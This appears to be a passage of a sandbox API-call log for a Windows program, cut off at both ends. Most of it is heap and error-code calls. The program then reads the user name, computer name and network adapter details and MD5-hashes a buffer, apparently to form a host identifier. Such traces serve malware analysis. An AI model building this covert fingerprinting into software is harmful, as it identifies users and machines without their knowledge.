lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1509 [0265.968] FreeEnvironmentStringsW (penv=0x69aec0) returned 1 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa0) returned 0x69aec0 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1f) returned 0x699e18 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x69af68 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x37) returned 0x69afa0 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x695c58 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x31) returned 0x69afe0 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x15) returned 0x695778 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69b020 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x14) returned 0x69b050 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xd) returned 0x695948 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x19) returned 0x699e40 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2d) returned 0x69b070 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x16) returned 0x69b0a8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x17) returned 0x69b0c8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69b0e8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe) returned 0x695960 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x97) returned 0x69b118 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3e) returned 0x695ca0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1b) returned 0x699e68 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1d) returned 0x699e90 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x69b1b8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x12) returned 0x69b208 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x69b228 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1b) returned 0x699eb8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x69b248 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x29) returned 0x69b278 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x699ee0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x77) returned 0x6938d8 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x17) returned 0x69b2b0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x14) returned 0x69b2d0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xf) returned 0x695978 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x16) returned 0x69b2f0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x69b310 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x29) returned 0x69b348 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x13) returned 0x69b380 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x12) returned 0x69b3a0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x699f08 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x12) returned 0x69c0a0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x18) returned 0x69c0c0 [0265.969] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x46) returned 0x69b3c0 [0265.969] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69ba98 | out: hHeap=0x680000) returned 1 [0265.971] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x69a070 [0265.971] LoadLibraryExW (lpLibFileName="api-ms-win-security-systemfunctions-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.971] GetLastError () returned 0x57 [0265.971] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.971] GetLastError () returned 0x57 [0265.971] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x75cf0000 [0265.971] GetProcAddress (hModule=0x75cf0000, lpProcName="SystemFunction036") returned 0x75cf1919 [0265.971] SystemFunction036 (in: RandomBuffer=0x2df64c, RandomBufferLength=0x4 | out: RandomBuffer=0x2df64c) returned 1 [0265.972] SystemFunction036 (in: RandomBuffer=0x2df64c, RandomBufferLength=0x4 | out: RandomBuffer=0x2df64c) returned 1 [0266.012] Start () [0266.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6932c0 [0266.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x69b608 [0266.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x69cde8 [0266.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69cde8 | out: hHeap=0x680000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x69cde8 [0266.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c0e0 [0266.013] GetProcAddress (hModule=0x75b90000, lpProcName="AreFileApisANSI") returned 0x75c240d1 [0266.013] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0266.014] GetLastError () returned 0x57 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="CompareStringEx") returned 0x75c246b1 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="EnumSystemLocalesEx") returned 0x75c2424f [0266.014] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0266.014] GetLastError () returned 0x57 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="GetDateFormatEx") returned 0x75c36676 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="GetLocaleInfoEx") returned 0x75c24751 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="GetTimeFormatEx") returned 0x75c365f1 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="GetUserDefaultLocaleName") returned 0x75c247c1 [0266.014] GetProcAddress (hModule=0x75b90000, lpProcName="IsValidLocaleName") returned 0x75c247e1 [0266.014] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0266.015] GetLastError () returned 0x57 [0266.015] GetProcAddress (hModule=0x75b90000, lpProcName="LCIDToLocaleName") returned 0x75bcced4 [0266.015] GetProcAddress (hModule=0x75b90000, lpProcName="LocaleNameToLCID") returned 0x75c24801 [0266.015] GetLastError () returned 0x57 [0266.015] SetLastError (dwErrCode=0x57) [0266.015] GetLastError () returned 0x57 [0266.015] SetLastError (dwErrCode=0x57) [0266.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bde0 [0266.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x69cfe8 [0266.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69cfe8 | out: hHeap=0x680000) returned 1 [0266.016] GetLastError () returned 0x57 [0266.016] SetLastError (dwErrCode=0x57) [0266.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x69bea0 [0266.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x69beb0 [0266.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x69bec0 [0266.016] GetLastError () returned 0x57 [0266.016] SetLastError (dwErrCode=0x57) [0266.016] GetLastError () returned 0x57 [0266.016] SetLastError (dwErrCode=0x57) [0266.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bed0 [0266.016] GetLastError () returned 0x57 [0266.016] SetLastError (dwErrCode=0x57) [0266.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x69cfe8 [0266.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69cfe8 | out: hHeap=0x680000) returned 1 [0266.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bea0 | out: hHeap=0x680000) returned 1 [0266.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bde0 | out: hHeap=0x680000) returned 1 [0266.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bec0 | out: hHeap=0x680000) returned 1 [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x69bec0 [0266.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x69bde0 [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x200) returned 0x69cfe8 [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x69bdf0 [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.017] GetLastError () returned 0x57 [0266.017] SetLastError (dwErrCode=0x57) [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bf90 [0266.018] GetLastError () returned 0x57 [0266.018] SetLastError (dwErrCode=0x57) [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x69d1f0 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69d1f0 | out: hHeap=0x680000) returned 1 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bec0 | out: hHeap=0x680000) returned 1 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bed0 | out: hHeap=0x680000) returned 1 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bdf0 | out: hHeap=0x680000) returned 1 [0266.018] GetLastError () returned 0x57 [0266.018] SetLastError (dwErrCode=0x57) [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x69c050 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bde0 | out: hHeap=0x680000) returned 1 [0266.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69beb0 | out: hHeap=0x680000) returned 1 [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x69c060 [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x69c070 [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe) returned 0x695a98 [0266.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c100 [0266.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695a98 | out: hHeap=0x680000) returned 1 [0266.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69c070 | out: hHeap=0x680000) returned 1 [0266.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6932c0 | out: hHeap=0x680000) returned 1 [0266.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c120 [0266.019] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0266.019] GetLastError () returned 0x57 [0266.019] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df820 | out: lpSystemTimeAsFileTime=0x2df820*(dwLowDateTime=0xd8bab80, dwHighDateTime=0x1d60de7)) [0266.019] GetLastError () returned 0x57 [0266.019] SetLastError (dwErrCode=0x57) [0266.019] GetLastError () returned 0x57 [0266.019] SetLastError (dwErrCode=0x57) [0266.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69c120 | out: hHeap=0x680000) returned 1 [0266.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x69b630 [0266.019] GetUserNameA (in: lpBuffer=0x754a9b80, pcbBuffer=0x2df860 | out: lpBuffer="aETAdzjz", pcbBuffer=0x2df860) returned 1 [0266.025] GetComputerNameW (in: lpBuffer=0x2df858, nSize=0x2df824 | out: lpBuffer="YKYD69Q", nSize=0x2df824) returned 1 [0266.026] GetAdaptersInfo (in: AdapterInfo=0x2dcffc, SizePointer=0x2dcfdc | out: AdapterInfo=0x2dcffc, SizePointer=0x2dcfdc) returned 0x0 [0266.733] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a48 [0266.733] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a58 [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a68 [0266.734] GetLastError () returned 0x0 [0266.734] SetLastError (dwErrCode=0x0) [0266.734] GetLastError () returned 0x0 [0266.734] SetLastError (dwErrCode=0x0) [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x6a5940 [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69c050 | out: hHeap=0x680000) returned 1 [0266.734] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bf90 | out: hHeap=0x680000) returned 1 [0266.734] GetLastError () returned 0x0 [0266.734] SetLastError (dwErrCode=0x0) [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7a78 [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x6a7a88 [0266.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x6a7a98 [0266.734] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.735] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bf90 [0266.735] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a78 | out: hHeap=0x680000) returned 1 [0266.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5940 | out: hHeap=0x680000) returned 1 [0266.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a98 | out: hHeap=0x680000) returned 1 [0266.735] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7a98 [0266.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x6a7a78 [0266.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x6a7aa8 [0266.735] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.735] GetLastError () returned 0x0 [0266.735] SetLastError (dwErrCode=0x0) [0266.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x6a5940 [0266.736] GetLastError () returned 0x0 [0266.736] SetLastError (dwErrCode=0x0) [0266.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a98 | out: hHeap=0x680000) returned 1 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bf90 | out: hHeap=0x680000) returned 1 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7aa8 | out: hHeap=0x680000) returned 1 [0266.736] GetLastError () returned 0x0 [0266.736] SetLastError (dwErrCode=0x0) [0266.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7aa8 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a78 | out: hHeap=0x680000) returned 1 [0266.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a88 | out: hHeap=0x680000) returned 1 [0266.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a88 [0266.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c2e0 [0266.736] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.737] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bf90 [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7aa8 | out: hHeap=0x680000) returned 1 [0266.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5940 | out: hHeap=0x680000) returned 1 [0266.737] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7aa8 [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x6a7a78 [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x6a7a98 [0266.737] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.737] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x6a5940 [0266.737] GetLastError () returned 0x0 [0266.737] SetLastError (dwErrCode=0x0) [0266.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7aa8 | out: hHeap=0x680000) returned 1 [0266.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69bf90 | out: hHeap=0x680000) returned 1 [0266.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a98 | out: hHeap=0x680000) returned 1 [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7a98 [0266.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2) returned 0x6a7aa8 [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.738] GetLastError () returned 0x0 [0266.738] SetLastError (dwErrCode=0x0) [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1) returned 0x6a7ab8 [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6) returned 0x6a7ac8 [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x5) returned 0x6a7ad8 [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x6a7ae8 [0266.739] GetLastError () returned 0x0 [0266.739] SetLastError (dwErrCode=0x0) [0266.739] GetLastError () returned 0x0 [0266.739] SetLastError (dwErrCode=0x0) [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x69bf90 [0266.739] GetLastError () returned 0x0 [0266.739] SetLastError (dwErrCode=0x0) [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6a6) returned 0x6a7e20 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7e20 | out: hHeap=0x680000) returned 1 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a98 | out: hHeap=0x680000) returned 1 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5940 | out: hHeap=0x680000) returned 1 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7ae8 | out: hHeap=0x680000) returned 1 [0266.739] GetLastError () returned 0x0 [0266.739] SetLastError (dwErrCode=0x0) [0266.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x6a7ae8 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7aa8 | out: hHeap=0x680000) returned 1 [0266.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a78 | out: hHeap=0x680000) returned 1 [0266.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a78 [0266.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x69b978 [0266.748] GetLastError () returned 0x0 [0266.748] GetProcAddress (hModule=0x75b90000, lpProcName="FlsGetValue") returned 0x75ba1252 [0266.748] SetLastError (dwErrCode=0x0) [0266.748] GetLastError () returned 0x0 [0266.748] SetLastError (dwErrCode=0x0) [0266.748] GetLastError () returned 0x0 [0266.748] SetLastError (dwErrCode=0x0) [0266.749] GetLastError () returned 0x0 [0266.749] SetLastError (dwErrCode=0x0) [0266.749] GetLastError () returned 0x0 [0266.749] SetLastError (dwErrCode=0x0) [0266.749] GetLastError () returned 0x0 [0266.749] SetLastError (dwErrCode=0x0) [0266.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69b978 | out: hHeap=0x680000) returned 1 [0266.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a58 | out: hHeap=0x680000) returned 1 [0266.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a48 | out: hHeap=0x680000) returned 1 [0266.749] GetAdaptersInfo (in: AdapterInfo=0x2dcffc, SizePointer=0x2dcfe0 | out: AdapterInfo=0x2dcffc, SizePointer=0x2dcfe0) returned 0x0 [0266.752] GetVersion () returned 0x1db10106 [0266.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x69b978 [0266.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5b50 [0266.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0266.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5b50 | out: hHeap=0x680000) returned 1 [0266.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x47) returned 0x69d2c8 [0266.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0266.753] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0266.753] VirtualAlloc (lpAddress=0x0, dwSize=0x3a, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0266.753] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e0000 [0266.753] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2df828, pszAlgId="MD5", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x2df828) returned 0x0 [0270.230] BCryptGetProperty (in: hObject=0x69dd50, pszProperty="ObjectLength", pbOutput=0x2df820, cbOutput=0x4, pcbResult=0x2df81c, dwFlags=0x0 | out: pbOutput=0x2df820, pcbResult=0x2df81c) returned 0x0 [0270.230] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x2f0000 [0270.230] BCryptGetProperty (in: hObject=0x69dd50, pszProperty="HashDigestLength", pbOutput=0x2df854, cbOutput=0x4, pcbResult=0x2df81c, dwFlags=0x0 | out: pbOutput=0x2df854, pcbResult=0x2df81c) returned 0x0 [0270.231] BCryptCreateHash (in: hAlgorithm=0x69dd50, phHash=0x2df824, pbHashObject=0x2f0000, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x69dd50, phHash=0x2df824, pbHashObject=0x2f0000) returned 0x0 [0270.231] BCryptHashData (in: hHash=0x2f0000, pbInput=0x170000, cbInput=0x39, dwFlags=0x0 | out: hHash=0x2f0000) returned 0x0 [0270.231] BCryptFinishHash (in: hHash=0x2f0000, pbOutput=0x160000, cbOutput=0x10, dwFlags=0x0 | out: hHash=0x2f0000, pbOutput=0x160000) returned 0x0 [0270.231] BCryptDestroyHash (in: hHash=0x2f0000 | out: hHash=0x2f0000) returned 0x0 [0270.231] VirtualFree (lpAddress=0x2f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.231] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x69dd50, dwFlags=0x0 | out: hAlgorithm=0x69dd50) returned 0x0 [0270.231] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x2f0000 [0270.232] wsprintfW (in: param_1=0x2f0000, param_2="%2.2X" | out: param_1="77") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0004, param_2="%2.2X" | out: param_1="19") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0008, param_2="%2.2X" | out: param_1="00") returned 2 [0270.232] wsprintfW (in: param_1=0x2f000c, param_2="%2.2X" | out: param_1="9A") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0010, param_2="%2.2X" | out: param_1="E6") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0014, param_2="%2.2X" | out: param_1="83") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0018, param_2="%2.2X" | out: param_1="8A") returned 2 [0270.232] wsprintfW (in: param_1=0x2f001c, param_2="%2.2X" | out: param_1="31") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0020, param_2="%2.2X" | out: param_1="C8") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0024, param_2="%2.2X" | out: param_1="28") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0028, param_2="%2.2X" | out: param_1="2C") returned 2 [0270.232] wsprintfW (in: param_1=0x2f002c, param_2="%2.2X" | out: param_1="80") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0030, param_2="%2.2X" | out: param_1="42") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0034, param_2="%2.2X" | out: param_1="63") returned 2 [0270.232] wsprintfW (in: param_1=0x2f0038, param_2="%2.2X" | out: param_1="C8") returned 2 [0270.232] wsprintfW (in: param_1=0x2f003c, param_2="%2.2X" | out: param_1="5C") returned 2 [0270.232] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x69d390 [0270.232] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0270.233] 